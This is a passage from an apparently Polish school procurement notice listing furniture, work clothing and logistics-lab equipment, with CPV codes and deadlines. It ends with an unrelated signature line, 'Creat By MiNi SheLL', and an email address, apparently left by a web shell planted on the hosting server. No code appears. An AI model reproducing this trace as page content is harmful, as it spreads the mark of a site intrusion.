przyr. Krzesło o stelażu zielonym, wzrost ucznia 159-188, siedzisko i oparcie sklejka liściasta, rura śr. 22mm, wy. do siedziska 460mm, wys. do oparcia 820 mm. 16. Stolik i krzesło dla nauczyciela (komplet) do prac przyrod. Biurko o rozm. min 1500x 600x760 z szufladą i szafką zamykaną pod biurkiem, front w kolorze białym, korpus w kolorze grafitowym, płyta wiórowa -melamina, uchwyty zielone, przerwa między blatem a szafką na dokumenty, krzesło obrotowe tapicerowane z regulacją, w kolorze jasnozielonym 17. Tablica biała, Tablica składana biała 3400x 1000, półka na pisaki, zestaw do montażu na ścianę. 18. Regał na modele do pracowni przyrodniczej. Regał - szafa z witryną zamykana na klucz (górna połowa za szkłem , dolna zamknięte półki) Wymiary 1960x800x400, płyta wiórowa- melamina, białe fronty, korpus grafitowy, uchwyty podłużne (33,7 cm), malowany MDF na zielono..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.16.00.00-1, 39.11.00.00-6, 39.15.10.00-5, 39.14.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Regały na szkło i sprzęt (zestaw robiony na zamówienie) do pracowni obsługi konsumenta..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Regały na szkło i sprzęt (zestaw robiony na zamówienie) do prac. obsł. kons ; Zestaw ścienny szer 2800+ 200mm zaślepka, wys całkowita 2650, gł szafek górnych 350, gł szafek dolnych 510, konstrukcja szafek wykonana z płyt wiórowych gr 18mm i oklejonej PCV 0,8 mm; drzwiczki pełne; witryny z MDV foliowany, w szafkach z witrynami na ścianach tylnych lustra o gr 4mm, w witrynach szkło przezroczyste o gr 4 mm, uchwyty US - 26 o roztawie 128mm, w cenę wliczony montaz mebli.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa odzieży ochronnej dla uczestnika zajęć obsługi pilarki ( kask, spodnie, buty, rękawice) antyprzecięciowe 10 kpl, Odzież robocza dla ucznia odbywającego staż z technikum organizacji usług gastronomicznych 50 kpl, Odzież robocza dla ucznia odbywającego staż z technikum leśnego 20 kpl, Odzież robocza dla ucznia odbywającego staż z technikum logistycznego 15 kpl, Odzież robocza dla ucznia odbywającego staż z technikum hotelarskiego15 kpl..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.W skład jednego kompletu odzieży bhp dla uczestnika zajęć obsługi pilarki wchodzi: kask ochronny z przesłoną twarzy, spodnie antyprzepięciowe, buty ochronne,rękawice pilarza, bluza polar,kurtka ochronna. 1. Kask z ochronnikami słuchu i twarzy,  Zestaw zawiera kask G2000, siatkową osłonę twarzy V4C, ochronnik słuchu H31P3K, osłonę przeciwdeszczową GR3C. 2. Spodnie letnie dla pilarza z wkładką antyprzepięciową klasy 2 do 24 m/s - CE kat. II; 3. Buty skórzane z systemem antyprzepięciowym, kolor czarny, odporne na działanie wody i wilgoci, stalowa osłona na czubach i w podeszwie, antystatyczne, olejoodporna podeszwa z grubą strukturą. 4. Rękawice, spełniają normy: EN 420, EN 388 & 381-7, Klasa 0 (16 m/s), dopasowane do nadgarstka, na zewnętrznej stronie wzmocniony, wodoodporny poliester, wkładka przeciw przecięciowa - ochrona lewej dłoni. 5. Wysokogatunkowa bluza Polar prostego kroju, dwie kieszenie. U dołu bluza regulowana elastycznym sznurkiem. Kontrastowy kolor od wewnętrznej strony kołnierza,- 100% poliestru, Fleece, 280 g/m2- kolor: zieleń butelkowa; 6. Kurtka-tkanina z mieszanki: 37% bawełna i 63% poliester, materiał odporny na uszkodzenia mechaniczne i wodę, wentylacja na plecach, kieszenie na piersi, kurtka zapinana na zamek błyskawiczny plus zakładka z zatrzaskami, regulowana szerokość rękawa napami, przedłużany tył kurtki, dwie kieszenie boczne. II W skład jednego kompletu odzieży roboczej dla ucznia odbywającego staż z technikum organizacji usług gastronomicznych wchodzi: zapaska dwukolorowa dla kobiet i mężczyzn, koszulka, fartuszek, fartuch uniwersalny. 1. Zapaska dwukolorowa dla kobiet i mężczyzn, kolor czarno-czerwony, wymiar  96 x 69 cm, dopinana kieszonka w komplecie,  wymienny pasek w komplecie; T-shirt, 2. Elegancka koszulka, kolor: czarny, krótki rękaw, 3. Fartuszek  ze stójką, kolor biały z czarną wypustką, wywijany rękaw 3/4, asymetryczne zapięcie na suwak, rozcięcia po bokach, 3 guziki, 4. Uniwersalny fartuch wiązany, kolor zielony, zakładany przez głowę, regulacja długości (sznurek), materiał: TNG light, TNG light kolor, TNG basic, TNG pro III. W skład jednego kompletu odzieży roboczej dla ucznia odbywającego staż z technikum leśnego wchodzi: spodnie, koszulka, bluza. 1.Spodnie-lekkie  z tkaniny laminowanej z membraną o wydajności 10.000/10.000; wodoodporne  zamki, guma wszyta w pas, zapinane kieszenie na ręce i dodatkowa kieszeń naszyta na nogawce, od wewnątrz siatkowa podszewka, kolor zielony(forest lub moro);  2. Koszulka-krótki rękaw, kolor: khaki; 3. Bluza polar, kolor khaki, zapinana na zamek błyskawiczny kostkowy, na przodach odszyte 3 kieszenie w ramkach z tkaniny wodoodpornej zamykane kostkowymi zamkami błyskawicznymi, na karczki przodów i tyłu naszyte są łaty z tkaniny wodoodpornej, rękawy jednoczęściowe w podwinięciu wszyta guma do ściągnięcia, dół bluzy ściągnięty sznurkiem - gumą z możliwością regulacji obwodu stoperami dwufunkcyjnymi. IV. W skład jednego kompletu odzieży roboczej dla ucznia odbywającego staż z technikum logistycznego wchodzi: fartuch ochronny i buty sportowe. 1. Fartuch ochronny - 65% poliester, 35% bawełna - gramatura 270 g/m2 , odporny na wytarcia,  zapinany na napy , z tyłu fartucha w partii pasa wykonano pasek z tego samego materiału , dwie kieszenie w dolnej partii oraz jedna w górnej - dodatkowa kieszeń po prawej stronie od wewnątrz, rękawy zapinane na rzep lub napy; 2. Buty sportowe, rekreacyjne, w jasnych barwach, pokrycie -przewiewna tkanina połączona z materiałem syntetycznym, wyściółka-  zapewnia wentylację, absorbuje pot, odporna i zapobiegająca otarciom, wkładka wymienna, antystatyczna, pokryta tkaniną, podeszwa nitryl.	V. W skład jednego kompletu odzieży roboczej dla ucznia odbywającego staż w technikum hotelarskim wchodzi: princeska i bluzka, 1. Princeska- czarno biała, z możliwością dopasowywania się do sylwetki pracownika, kopertowa;2. Bluzka: elegancka damska, kolor biały,  rękaw 3/4, materiał TNG shirt bawełna/poliester -koszulówka. VI. Strój kelnerski  dla dziewcząt :bluzka damska, koszulowa,  w kolorze białym, stanowiąca uzupełnienie do zapaski kelnerskiej, zapinana na guziki, podkrój szyi w kształcie litery V, wykończony kołnierzykiem, zaszewki dopasowujące piersiowe i pionowe, rękawy długie wykończone mankietem z możliwością wywinięcia, skład surowcowy: 65% Poliester 35% Bawełna oraz fartuch krótki (zapaska)  sięgający do wysokości kolan, z parą wiązań na wysokości pasa umożliwiającą regulację jego szerokości. Profesjonalnie wykonany z mocnego materiału; wymiary fartucha: 55 x 70 cm (długość x szerokość), długość wiązań: 70 cm, materiał: 35% bawełna / 65% poliester, kolor bordo. 2) Strój kelnerski dla chłopców: zapaski kelnerskie ,wymiary 85 x 95 cm (długość x szerokość) długość wiązań: 85 cm, materiał: 65% poliester, 35% bawełna ,gramatura: 210g/m2,kolor czarny oraz  koszulka typu polo, kolor biały, dwa guziki pod szyją, skład surowcowy ok 100% bawełny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.13.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wyposażenie pracowni logistycznej Zestaw sprzętu logistycznego zestaw 1, Oprogramowanie szt.1, Zestaw materiałów eksploatacyjnych, logistycznych zestaw 1, Mapa multimedialna szt. 1, Podręcznik do logowania na platformie Eel-edu szt. 12, Oprogramowanie tras przewozowych szt. 1, Gra symulacyjna przedsiębiorstwa transportowego szt. 5..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Sprzęt Logistyczny - LABORATORIUM LOGISTYCZNE Z WYKORZYSTANIEM TECHNOLOGII RFID Laboratorium - magazyn, umożliwia praktyczne zapoznanie się z nowocześnie przeprowadzanymi procesami magazynowania materiałów jak: przyjęcie, składowanie, kompletacja wydania towarów, automatyczna identyfikacja towarów. Zestaw ten pozwala na pełną prezentacje technologii RFID, który umożliwia przeprowadzenie zajęć z podziałem na grupy ćwiczeniowe z których każda wykonuje określony zakres zadań, jak - tworzenie dokumentu magazynowego, -kompletacja, - weryfikacja kompletacji poprzez skanowanie towaru w bramce RFID, - obsługa dokumentów magazynowych typu WZ, PZ, MM przesuniecie pomiędzy miejscami magazynowymi - obsługa inwentaryzacji i jej rozliczenia - wprowadzone miejsca magazynowego i dokument MM odzwierciadlający przemieszczanie wewnątrz magazynu. W skład zestawu wchodzi czytnik UHF RFID Intermec, 4 anteny z kablami, Konstrukcja nośna bramki, skrzynka sterująca, paleta, kartony, regały, drukarka profesjonalna termotrasferowa z modułem RFID, program do projektowania etykiet, ręczny czytnik UHF z możliwością odczytu kodów kreskowych Motorola MC9090, stacja dokująca, ręczny czytnik kodów kreskowych USB, etykiety logistyczne RFID 100 mmx 150 mm zgodne z EPC Gen2, zestaw tagów RFID zgodnych z EPC Gen2, instalacja, szkolenie do 4godzin oprogramowanie ComAx licencja na szkołę, licencja na dowolną ilość komputerów. 2.Podręcznik do logowania na platformie Eel-edu- umożliwiający logowanie się uczniów na edukacyjnej platformie, związanej interaktywnie z laboratorium logistycznym. 3 Wyposażenie prac logist w oprog komp - oprogramowanie ComAx, licencja na szkołę, licencja na dowolną ilość komputerów 4. Materiały eksploatacyjne logistyczne - MAPFACTOR PC NAVIGATOR 10 TRUCK EUROPA mapa multimedialna, laminowane, matowe, oprawione w rurki PCV; Mapa ścienna szt. 6 - administracyjno - drogowa Polski w skali: 1 700000, województwa lubelskiego w skali 1 185000, polityczna Świata 1 30 300 000 140x100cm , samochodowa drogowa Polski 1 700 000, polityczno -drogowa Europy 1 3500000, 140x100, sieci kolejowej Europy. Wymiary mapy: 98 x 69 cm. Modele środków transportowych a,samochodowegopo 1 sztuce - MAN plandeka z przyczepą 4-osiową, MAN skrzynia lus przyczepa, Volvo FH ciągnik z naczepą plandeką, Volvo FH wywrotka 3 osiowa, VOLVO FH z naczepą wywrotką, Sam ciągnik siodłowy, Ciągnik siodłowy MAN TG-A z naczepą + koparka, Tir z wywrotką z dwoma traktorami, Naczepa wywrotka, Naczepa cysterna, Model autobusu turystycznego, Autobus dwupoziomowy Setra 1,55 Autobus przegubowy. b, kolejowego po 1 sztuce - Wagon cysterna, Wagon towarowy, Wagon pasażerski, Wagon platforma, Wagon węglarka, Lokomotywa spalinowa, Pociąg regionalny, Tramwaj. c, lotniczego - HERPA Antonov AN225 Mriya szt. 1 SCHABAK LOT B767300 1 szt. - Biblioteczka zawodowa- wyposażona w dokumentacje, instrukcje, normy, procedury, przewodniki, regulaminy, przepisy prawne właściwe dla pracowni- katalog środków transportowych , album śr. Transportu kolejowego 5 szt. Koleje świata. Ilustrowane kompendium wydawnictwo Jacek Olesiejuk, twarda oprawa, format A4.1000 samolotów. Praca zbiorowa wydawnictwo Jacek Olesiejuk 2 szt. Album ze zdjęciami Transport morski, Statki. Encyklopedia 1 szt. album śro. Transportu samochodowego Ciężarówki. Leksykon - wzory dokumentacji transportowej,- wzory dokumentów transportowych, - przepisy prawne z zakresu transportu, poradnik przewoźnika wydawnictwo - Wiedza i praktyka:1 szt. -Kodeks cywilny, handlowy, pracy, drogowy - prenumerata czasopism Logistyka- komplet podręczników wydawnictwa Instytut logistyki i magazynowania 2 komplety-komplet podręczników wydawnictwo Difin1 komplet - Komplet podręczników umożliwiających logowanie się na platformie Eel-edu szt. 12 -Decyzje logistyczne z Excelem- Książka prezentuje możliwości wykorzystania arkusza kalkulacyjnego do wspomagania decyzji w obszarze logistyki przedsiębiorstw 1 szt. - Kompendium wiedzy o logistyce 2010, Wydawnictwo Naukowe PWN 1 szt. -Logistyka w przedsiębiorstwie Czesław Skowronek, Zdzisław Sarjusz-Wolski 1 szt. -Logistyka miejska. Koncepcje, systemy, rozwiązania Blanka Tundys 1 szt. -Logistyka zwrotna- Jacek Szołtysek Wydawca: Instytut Logistyki i Magazynowania1 szt. -Kody kreskowe Rodzaje Standardy Sprzęt Zastosowania Elżbiety Hałas Wydawca Instytut Logistyki i Magazynowania 1 szt. 5 Mapa multimedialna - MAPFACTOR PC Navigator 11 Truck Europa -najnowsza mapa Europy na komputer pc. 6.Oprogramowanie tras przewozowych - Optymalizacja tras transportowych- program służący do wyznaczania i planowania tras przewozowych -E-mapa Transport plus. 7 Gra symulacyjna przedsiębiorstwa transportowego EURO TRUCK SIMULATOR 2 PC PL JĘZYK polski OKŁADKA polski INSTRUKCJA polski, Euro Truck Simulator 2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.11.40.00-2, 22.47.10.00-2, 72.51.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com